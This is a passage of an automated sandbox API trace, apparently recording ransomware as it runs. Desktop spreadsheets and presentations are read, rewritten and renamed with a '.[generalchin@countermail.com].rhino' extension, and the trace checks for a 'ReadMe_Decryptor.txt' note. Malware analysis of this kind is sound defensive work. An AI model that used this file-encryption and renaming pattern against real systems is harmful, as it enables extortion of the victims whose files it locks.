hHeap=0x6d0000) returned 1 [0080.916] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x77a600 [0080.917] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74b7b8 | out: hHeap=0x6d0000) returned 1 [0080.917] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x789638 [0080.919] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77a600 | out: hHeap=0x6d0000) returned 1 [0080.920] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x21c32) returned 0x2230048 [0080.924] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x789638 | out: hHeap=0x6d0000) returned 1 [0080.924] WriteFile (in: hFile=0x124, lpBuffer=0x2230060*, nNumberOfBytesToWrite=0x17635, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x2230060*, lpNumberOfBytesWritten=0x4af2ac*=0x17635, lpOverlapped=0x0) returned 1 [0080.925] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2230048 | out: hHeap=0x6d0000) returned 1 [0080.925] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x17635, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0080.925] CloseHandle (hObject=0x124) returned 1 [0080.929] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eba00 [0080.929] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x6f9208 [0080.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eba00 | out: hHeap=0x6d0000) returned 1 [0080.929] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OiPhiPq EQyGt8pCeAoV.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oiphipq eqygt8pceaov.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OiPhiPq EQyGt8pCeAoV.csv.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oiphipq eqygt8pceaov.csv.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0081.076] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f9208 | out: hHeap=0x6d0000) returned 1 [0081.076] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0081.076] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7630c0 | out: hHeap=0x6d0000) returned 1 [0081.076] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0081.076] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f69c8 | out: hHeap=0x6d0000) returned 1 [0081.076] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f69c8 [0081.076] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eba00 [0081.076] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f69c8 | out: hHeap=0x6d0000) returned 1 [0081.076] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0081.076] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eba00 | out: hHeap=0x6d0000) returned 1 [0081.076] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Q4jLxFd3p.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\q4jlxfd3p.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0081.077] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0xd91c [0081.077] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xda3c, nNumberOfBytesToLockHigh=0x0) returned 1 [0081.077] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.077] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0081.078] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.079] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0xd91c, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0xd91c, lpOverlapped=0x0) returned 1 [0081.080] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0081.080] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.080] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0081.080] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0081.080] GetLastError () returned 0x0 [0081.080] SetLastError (dwErrCode=0x0) [0081.080] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0081.080] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd93f) returned 0x744cd8 [0081.080] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0081.080] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0081.080] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0081.081] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0081.081] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.081] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0081.081] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0081.081] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.081] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0081.081] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0081.081] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0081.081] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.081] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0081.081] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0081.081] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714188 [0081.081] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.081] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714170 [0081.081] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0081.081] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0081.082] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0081.082] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0081.082] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0081.082] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0081.082] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0081.082] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0081.082] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0081.082] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0081.082] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0081.082] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0081.082] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0081.082] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0081.082] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0081.082] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0081.082] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0081.082] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0081.082] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0081.082] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0081.083] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0081.083] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75b0d8 [0081.083] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0081.083] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0081.083] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75b0d8 | out: hHeap=0x6d0000) returned 1 [0081.083] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x6ee498 [0081.083] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0081.083] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x6eee00 [0081.083] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0081.083] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6efc18 [0081.083] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eee00 | out: hHeap=0x6d0000) returned 1 [0081.083] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x715898 [0081.083] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6efc18 | out: hHeap=0x6d0000) returned 1 [0081.083] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x6ee498 [0081.083] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0081.105] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x715898 [0081.105] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0081.105] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x752620 [0081.106] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0081.106] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x2230048 [0081.108] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x752620 | out: hHeap=0x6d0000) returned 1 [0081.108] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x223a078 [0081.109] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2230048 | out: hHeap=0x6d0000) returned 1 [0081.110] WriteFile (in: hFile=0x124, lpBuffer=0x223a080*, nNumberOfBytesToWrite=0xda3c, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x223a080*, lpNumberOfBytesWritten=0x4af2ac*=0xda3c, lpOverlapped=0x0) returned 1 [0081.110] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x223a078 | out: hHeap=0x6d0000) returned 1 [0081.110] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xda3c, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0081.110] CloseHandle (hObject=0x124) returned 1 [0081.117] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6fabf0 [0081.117] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x6f36d0 [0081.117] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fabf0 | out: hHeap=0x6d0000) returned 1 [0081.117] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Q4jLxFd3p.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\q4jlxfd3p.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Q4jLxFd3p.pptx.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\q4jlxfd3p.pptx.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0081.118] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0081.118] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0081.118] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0081.118] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f69c8 [0081.118] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0081.119] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0081.119] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eba00 [0081.119] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0081.119] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0081.119] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eba00 | out: hHeap=0x6d0000) returned 1 [0081.119] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SXVymLvqnxgquigP57Pv.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sxvymlvqnxgquigp57pv.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0081.119] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x155e2 [0081.119] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x15702, nNumberOfBytesToLockHigh=0x0) returned 1 [0081.119] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.119] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0081.120] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.121] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x155e2, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x155e2, lpOverlapped=0x0) returned 1 [0081.122] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0081.122] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.122] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0081.122] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0081.122] GetLastError () returned 0x0 [0081.122] SetLastError (dwErrCode=0x0) [0081.122] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0081.122] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x15605) returned 0x744cd8 [0081.244] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0081.244] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0081.244] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0081.244] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0081.244] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.245] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0081.245] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0081.245] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.245] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0081.245] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0081.245] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0081.245] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.245] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0081.245] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0081.245] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714170 [0081.245] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.245] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714188 [0081.245] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0081.245] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0081.245] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0081.245] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0081.245] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0081.245] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0081.245] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0081.245] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0081.246] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0081.246] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0081.246] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0081.246] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0081.246] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0081.246] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0081.246] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0081.246] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0081.246] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0081.246] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0081.246] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0081.246] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0081.246] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0081.246] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75b0d8 [0081.246] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0081.246] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0081.246] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75b0d8 | out: hHeap=0x6d0000) returned 1 [0081.246] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x75a2e8 [0081.246] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0081.246] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x6ee498 [0081.246] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75a2e8 | out: hHeap=0x6d0000) returned 1 [0081.247] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6ef2b0 [0081.247] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0081.247] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x715898 [0081.247] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef2b0 | out: hHeap=0x6d0000) returned 1 [0081.247] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x6ee498 [0081.247] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0081.249] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x715898 [0081.249] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0081.249] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x2230048 [0081.251] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0081.251] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x2236b28 [0081.251] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2230048 | out: hHeap=0x6d0000) returned 1 [0081.251] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x2240b58 [0081.252] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2236b28 | out: hHeap=0x6d0000) returned 1 [0081.253] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x7630c0 [0081.255] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2240b58 | out: hHeap=0x6d0000) returned 1 [0081.256] WriteFile (in: hFile=0x124, lpBuffer=0x7630e0*, nNumberOfBytesToWrite=0x15702, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x7630e0*, lpNumberOfBytesWritten=0x4af2ac*=0x15702, lpOverlapped=0x0) returned 1 [0081.256] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7630c0 | out: hHeap=0x6d0000) returned 1 [0081.257] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x15702, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0081.257] CloseHandle (hObject=0x124) returned 1 [0081.258] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eba00 [0081.258] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x6f9208 [0081.258] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eba00 | out: hHeap=0x6d0000) returned 1 [0081.258] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SXVymLvqnxgquigP57Pv.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sxvymlvqnxgquigp57pv.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SXVymLvqnxgquigP57Pv.xlsx.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sxvymlvqnxgquigp57pv.xlsx.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0081.260] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f9208 | out: hHeap=0x6d0000) returned 1 [0081.260] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0081.260] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0081.260] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0081.260] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f69c8 | out: hHeap=0x6d0000) returned 1 [0081.260] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f69c8 [0081.260] 